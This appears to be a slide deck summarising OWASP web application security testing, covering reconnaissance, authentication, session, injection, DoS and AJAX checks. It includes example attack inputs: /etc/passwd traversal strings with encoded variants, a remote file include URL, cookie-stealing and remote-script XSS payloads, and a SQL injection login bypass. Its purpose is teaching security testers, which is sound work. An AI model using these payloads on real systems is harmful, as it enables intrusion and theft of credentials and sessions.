This document provides an overview of the Open Web Application Security Project (OWASP). It discusses OWASP's mission to improve application security and lists some of its key projects, including the OWASP Top Ten, a list of the most critical web application security flaws. It also summarizes several common security testing techniques like information gathering, authentication testing, session management testing, and input validation testing. Tools are mentioned for each technique.
13. Information Gathering
Application Discovery
Related issues:
Different base URL
Non-standard ports
Virtual hosts
14. Information Gathering
Application Discovery
Different base URL:
Directory exploration?
Google (site:www.example.com)
Candidate URLs (Ex. Nessus)
15. Information Gathering
Application Discovery
Non-standard ports:
nmap –P0 –sT –sV –p1-65535 192.168.1.100
Interesting ports on 192.168.1.100:
(The 65527 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
443/tcp open ssl OpenSSL
901/tcp open http Samba SWAT administration server
16. Information Gathering
Application Discovery
Virtual hosts:
$ host -t ns www.owasp.org
www.owasp.org is an alias for owasp.org.
owasp.org name server ns1.secure.net.
owasp.org name server ns2.secure.net.
http://searchdns.netcraft.com/?host
17. Information Gathering
Spidering and Googling
Spidering:
wget -r http://www.example.com
Googling:
googlegath.pl
http://www.nothink.org/perl/googlegath/
18. Information Gathering
SSL/TLS Testing
Vulnerability Scanners:
Expired certificates
Weak Ciphers
...
Other tools: OpenSSL, SSLDigger
19. Information Gathering
Testing for File Extensions Handling
Identify underlying technologies
Tools:
wget
curl
web mirroring tools
vulnerability scanners
20. Information Gathering
Application Configuration Management Testing
Typical files and y directorios conocidos
Be careful with HTML comments
Personalize Error Pages
Only load necessary modules
Minimised privileges
Access (correct and incorrect) log
21. Information Gathering
Old, Backup and Unreferenced Files
Site map and technology clues
Content clues
Practices:
look into robots.txt, sitemaps files
public information (cache: site:)
search files: ~ .old .bak...
22. Information Gathering
Old, Backup and Unreferenced Files
No use: mod_autoindex y mod_info (Hide
unnecessary information)
Correctness permisions
Use CHROOT
Logs recommendations
23. Nessus
http://www.nessus.org
Port Scanner
Vulnerability Scanner
30. Authentication
Directory traversal/file include
Known as “dot-dot-slash”
2 evaluation steps:
Input vectors enumeration
Testing Techniques
31. Authentication
Directory traversal/file include
Input vectors enumeration:
HTTP GET y POST requests
File loading
HTML forms
...
32. Authentication
Directory traversal/file include
Testing Techniques:
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
CAREFUL WITH CHARSET!!
%2e%2e%2f is ../
%2e%2e/ is ../ %2e%2e%5c is ..
..%2f is ../ %2e%2e is ..
..%5c is ..
33. Authentication
Directory traversal/file include
Tools:
WebScarab
Paros
Burp Suite
34. Authentication
Vulnerable remember password and pwd reset
"Security questions":
Multiple questions
Strong questions
Number of attempts
CAPTCHA
Sending to email
35. Authentication
Vulnerable remember password and pwd reset
Careful with “Remember password”:
<INPUT TYPE="password" AUTOCOMPLETE="off">
If password is into a Cookie:
In a hashed form
36. Session Management
Logout and Browser Cache Management Testing
End Web Session:
• The user logs out
• The user remains idle for a certain amount of time and the
application automatically logs him/her out
43. Session Management
Cross Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to
execute unwanted actions on a web application in which he is currently authenticated.
Recommended practices:
Add session-related information in URLs
Use POST
Intermediate pages (“Are you sure you really
want to do this?”)
Use REFERER headers
44. Data Validation
XSS (Cross Site Scripting)
XSS: Code injection attacks into the various interpreters in the browser.
http://server/cgi-bin/testcgi.exe?
<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>
<script src=http://www.example.com/malicious-code.js></script>
%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
x3cscript src=http://www.example.com/malicious-code.jsx3ex3c/scriptx3e
Revise all input vectors
45. Data Validation
XSS (Cross Site Scripting)
Tools:
OWASP CAL9000
46. Data Validation
SQL Injection
Insertion or "injection" of an SQL query via the input data from the client to the application.
Example:
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
Input:
$username = 1' or '1' = '1
$password = 1' or '1' = '1
SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
48. Data Validation
Other Injections
LDAP Injection (Lightweight Directory Access Protocol)
ORM Injection (Hibernate in Java, Nhibernate in .NET,
ActiveRecord in Ruby on Rails)
XML Injection
SSI Injection
XPATH Injection
IMAP/SMTP Injection
System commands Injection
49. Data Validation
Buffer overflow
Issues caused by buffer overflows:
Denial of service (DoS)
Code Injection
Code execution
Practices:
Update software
Best practices
50. Denial of Service
User accounts blocked (Use CAPTCHAs)
Buffer overflows
User specified object allocation
User input as a loop counter
User provide data to disk
Failure to release resources
Store too much data in Session
51. Web Services
XML Structural Testing
Overloading the XML parser
XML Content-level Testing
XML/SQL/XPath... Injections
Validate Input Size
Naugthy SOAP Attachments Testing
Man-in-the-middle Testing
52. AJAX Testing
Increased attack surface with many more inputs to secure
Exposed internal functions of the application
Client access to third-party resources with no built-in
security and encoding mechanisms
Failure to protect authentication information and sessions
Blurred line between client-side and server-side code,
resulting in security mistakes